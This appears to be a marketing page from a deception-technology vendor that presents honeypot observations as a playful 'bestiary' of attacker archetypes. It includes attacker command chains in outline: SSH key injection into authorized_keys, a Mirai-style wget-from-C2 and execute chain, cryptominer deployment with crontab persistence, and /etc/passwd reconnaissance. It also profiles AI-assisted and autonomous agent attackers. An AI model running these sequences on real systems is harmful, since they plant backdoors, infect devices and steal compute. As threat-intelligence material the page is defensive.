Threat Actor Field Guide

The Bestiary of Cyber Threats

This bestiary is drawn from observations of over 6 million events captured on live nodes during a two-week period in April 2026. It is a representation of the types of threats Deception Check can help identify. Every attacker is classified into an archetype and rated on a 0 to 10 scale, with rarity tiers calculated from how often we see each one across the fleet.

Legendary (2)  ·  Rare (5)  ·  Uncommon (3)  ·  Common (1)
πŸ•·οΈ

RAT Operator

Level 11 Necromancer
Neutral Evil
Encounter Rate: 1 in 8,887
🟧 Legendary
"The Puppeteer. Remote Access Trojans give them persistent, stealthy control. IRC channels become command centers, reverse shells become puppet strings. They don't just break in β€” they move in."
Capability
7
Aggression
5
Speed
4
Knowledge
6
Adaptability
6
Lethality
5

Signature Move

IRC PRIVMSG β†’ DDoS command dispatch across thousands of zombies

Weakness

IRC C2 takedowns, behavioral detection of C2 beaconing, egress filtering

Famous Examples

  • Outlaw Gang (Perl-based)
  • XorDDoS operators
  • ChinaZ DDoS crew
  • ShellBot campaigns

Loot Dropped

Persistent backdoor access, DDoS-for-hire capacity, credential dumps

1
IPs Observed
0.0%
of All Attackers
Legendary
Rarity Tier
πŸ€–

AI-Assisted Attacker

Level 16 Wizard
Lawful Evil
Encounter Rate: 1 in 2,962
🟧 Legendary
"The Augmented. Human intent amplified by LLM co-pilots. Their commands are grammatically perfect, contextually appropriate, and arrive at suspiciously consistent intervals. No typos. No hesitation. They ask the AI what to do next, and it tells them β€” faster than any human could plan alone."
Capability
9
Aggression
5
Speed
6
Knowledge
9
Adaptability
8
Lethality
8

Signature Move

Perfectly structured recon chain with zero typos, 2-4 second intervals, context-aware pivots

Weakness

AI guardrails limiting truly novel attacks, behavioral analytics detecting too-perfect patterns

Famous Examples

  • ChatGPT-assisted pentesters (2023+)
  • Claude-powered red team operators
  • Copilot-aided exploit development
  • AI-generated phishing campaigns

Loot Dropped

Well-documented attack paths, AI-generated exploit code, automated reporting

3
IPs Observed
0.0%
of All Attackers
Legendary
Rarity Tier
πŸ”‘

Credential-Spray Bot

Level 6 Rogue
Neutral Evil
Encounter Rate: 1 in 168
🟦 Rare
"Patient and relentless, the Credential Sprayer cycles through thousands of username:password pairs harvested from breaches and default firmware lists. They don't pick locks β€” they try every key on the ring until one fits."
Capability
4
Aggression
6
Speed
7
Knowledge
4
Adaptability
2
Lethality
3

Signature Move

61-password IoT default blitz in under 30 seconds

Weakness

Account lockouts, fail2ban, key-only SSH auth

Famous Examples

  • Mirai's original credential list (61 pairs)
  • Hydra botnets
  • THC-Hydra operators
  • Medusa brute-force campaigns

Loot Dropped

Valid credential pairs for lateral movement

53
IPs Observed
0.6%
of All Attackers
Rare
Rarity Tier
πŸ•ΈοΈ

Web Exploit Scanner

Level 8 Monk
Neutral Evil
Encounter Rate: 1 in 135
🟦 Rare
"Swift and methodical, the Web Exploit Scanner throws hundreds of known CVE paths at every HTTP endpoint it finds. phpunit eval-stdin, .env files, Log4Shell JNDI strings, Spring4Shell class loaders β€” each request a precisely aimed strike at a known weakness."
Capability
6
Aggression
7
Speed
9
Knowledge
6
Adaptability
3
Lethality
5

Signature Move

50+ phpunit path permutations in a single burst, then .env file harvesting

Weakness

WAFs with virtual patching, up-to-date dependencies

Famous Examples

  • Nuclei-based scanners
  • Zgrab campaigns
  • Log4Shell mass-exploitation wave (Dec 2021)
  • ThinkPHP botnet
  • Spring4Shell spray (2022)

Loot Dropped

Exposed credentials from .env files, RCE shells, cloud API keys

66
IPs Observed
0.7%
of All Attackers
Rare
Rarity Tier
⛏️

Cryptominer Operator

Level 9 Artificer
Neutral Evil
Encounter Rate: 1 in 254
🟦 Rare
"The Prospector doesn't destroy β€” they extract. After gaining access, they immediately survey the hardware: nvidia-smi for GPUs, lscpu for cores, free -m for RAM. If the specs are right, they deploy XMRig pointing at their Monero pool and vanish β€” leaving only elevated electricity bills and degraded performance."
Capability
7
Aggression
4
Speed
5
Knowledge
7
Adaptability
6
Lethality
2

Signature Move

nvidia-smi -q β†’ lscpu β†’ nproc β†’ deploy xmrig β†’ set crontab persistence β†’ kill competing miners

Weakness

Process monitoring, CPU usage alerts, egress filtering on stratum ports

Famous Examples

  • TeamTNT
  • Kinsing / Kdevtmpfsi
  • Outlaw (Perl-based)
  • WatchDog
  • 8220 Gang
  • Rocke Group

Loot Dropped

Monero (XMR) cryptocurrency, pool statistics revealing operator wallet

35
IPs Observed
0.4%
of All Attackers
Rare
Rarity Tier
πŸ§‘β€πŸ’»

Human Attacker

Level 14 Fighter
Chaotic Neutral
Encounter Rate: 1 in 185
🟦 Rare
"Fingers on keyboard, brain engaged. The Human Attacker reads error messages, adjusts their approach, explores directories, and makes decisions. They might mistype 'sl' instead of 'ls' β€” that's how you know they're real. Irregular timing, creative pivots, genuine curiosity about what's on the box."
Capability
8
Aggression
6
Speed
3
Knowledge
8
Adaptability
9
Lethality
7

Signature Move

whoami β†’ uname -a β†’ cat /etc/passwd β†’ ls /home β†’ find / -name '*.conf' β€” genuine exploration

Weakness

Honeypot deception (they trust what they see), EDR behavioral detection, session recording

Famous Examples

  • APT28 (Fancy Bear) operators
  • Lazarus Group hands-on-keyboard
  • LAPSUS$ teenage hackers
  • Individual bug bounty hunters gone rogue

Loot Dropped

Targeted intelligence, custom tools, unpredictable lateral movement

48
IPs Observed
0.5%
of All Attackers
Rare
Rarity Tier
🦾

Agentic Attacker

Level 18 Construct (Golem)
True Neutral
Encounter Rate: 1 in 1,777
🟦 Rare
"No human in the loop. The Agentic Attacker is a fully autonomous system β€” an AI agent with tools, memory, and objectives. It scans, exploits, escalates, and exfiltrates without ever pausing for human approval. Sub-second decision loops. Zero emotional tells. The future of offensive security, and it's already here."
Capability
9
Aggression
7
Speed
10
Knowledge
8
Adaptability
7
Lethality
9

Signature Move

0.2-second inter-command gaps, 8+ unique commands, zero typos, systematic enumeration patterns no human would execute that cleanly

Weakness

Brittle against unexpected environments, can be fingerprinted by timing analysis, easily confused by honeypot deception

Famous Examples

  • PentestGPT autonomous mode
  • AutoSploit
  • DARPA Cyber Grand Challenge bots
  • Hypothetical: Claude-as-red-team-agent
  • AI worms (proof of concept, 2024)

Loot Dropped

Complete automated attack reports, zero-day chains, reproducible exploit playbooks

5
IPs Observed
0.1%
of All Attackers
Rare
Rarity Tier
πŸ”­

Known Scanner

Level 5 Ranger
Lawful Neutral
Encounter Rate: 1 in 49
🟩 Uncommon
"The cartographers of cyberspace. They map every port, banner, and certificate across the entire IPv4 range β€” not to attack, but to illuminate. Their scans are disclosed, their intent transparent, their User-Agent strings polite."
Capability
3
Aggression
2
Speed
9
Knowledge
8
Adaptability
3
Lethality
1

Signature Move

Full IPv4 port sweep in under 45 minutes

Weakness

Blocklists and rate limiters immediately neutralize them

Famous Examples

  • Censys (University of Michigan)
  • Shodan (John Matherly)
  • Shadowserver Foundation
  • ONYPHE
  • Palo Alto Xpanse
  • BinaryEdge

Loot Dropped

Internet-wide scan datasets, research papers

180
IPs Observed
2.0%
of All Attackers
Uncommon
Rarity Tier
πŸ›

Mirai / IoT Botnet

Level 12 Warlock (Swarm Patron)
Chaotic Evil
Encounter Rate: 1 in 23
🟩 Uncommon
"The Hive Mind. Born from the original Mirai source code leak in 2016, its variants now number in the thousands. Each infected device becomes a drone β€” scanning, brute-forcing, and DDoSing on command. The busybox echo fingerprint is its battle cry."
Capability
7
Aggression
9
Speed
8
Knowledge
3
Adaptability
5
Lethality
7

Signature Move

enable β†’ system β†’ shell β†’ sh β†’ busybox echo \\xNN tag β†’ wget C2 β†’ chmod +x β†’ execute for all 12 architectures

Weakness

Firmware updates, changed default passwords, network segmentation

Famous Examples

  • Mirai (Anna-senpai / Paras Jha)
  • Mozi
  • Echobot
  • Satori / Okiru
  • InfectedSlurs
  • MANGA/Dark

Loot Dropped

DDoS-for-hire capacity, proxy networks, crypto mining rigs

388
IPs Observed
4.4%
of All Attackers
Uncommon
Rarity Tier
πŸ—οΈ

SSH Key Injector

Level 10 Assassin
Lawful Evil
Encounter Rate: 1 in 31
🟩 Uncommon
"Silent and methodical. The SSH Key Injector doesn't ransack the system β€” they plant a backdoor. cd ~ β†’ rm -rf .ssh β†’ mkdir .ssh β†’ echo 'ssh-rsa AAAA...' >> authorized_keys β†’ chmod go= .ssh. One key, permanent access. They'll be back."
Capability
8
Aggression
3
Speed
6
Knowledge
7
Adaptability
7
Lethality
6

Signature Move

chattr -ia .ssh β†’ rm β†’ mkdir β†’ inject RSA key β†’ chmod 700 β€” all in under 2 seconds

Weakness

Immutable authorized_keys, key-based auth with agent forwarding disabled, file integrity monitoring

Famous Examples

  • FritzFrog P2P botnet
  • RapperBot
  • Outlaw SSH worm
  • Ebury (Operation Windigo)
  • Chaos RAT operators

Loot Dropped

Persistent backdoor access, lateral movement capability across the network

283
IPs Observed
3.2%
of All Attackers
Uncommon
Rarity Tier
πŸͺ°

Nuisance Scanner

Level 1 Commoner
Chaotic Neutral
Encounter Rate: 1 in 1
⬜ Common
"The background radiation of the Internet. Single SYN packets flung at random IPs, connection resets before the banner even loads. They exist in the billions, accomplish nothing individually, and waste everyone's log storage."
Capability
1
Aggression
1
Speed
5
Knowledge
1
Adaptability
1
Lethality
0

Signature Move

SYN β†’ RST in under 200ms, never to return

Weakness

Literally everything. A closed port stops them.

Famous Examples

  • ZMap background noise
  • Residential botnet probes
  • Masscan leftovers
  • Misconfigured monitoring tools

Loot Dropped

Nothing. Not even a complete TCP handshake.

7,825
IPs Observed
88.0%
of All Attackers
Common
Rarity Tier
© 2026 Deception Check, Inc. Patent Pending.deceptioncheck.ai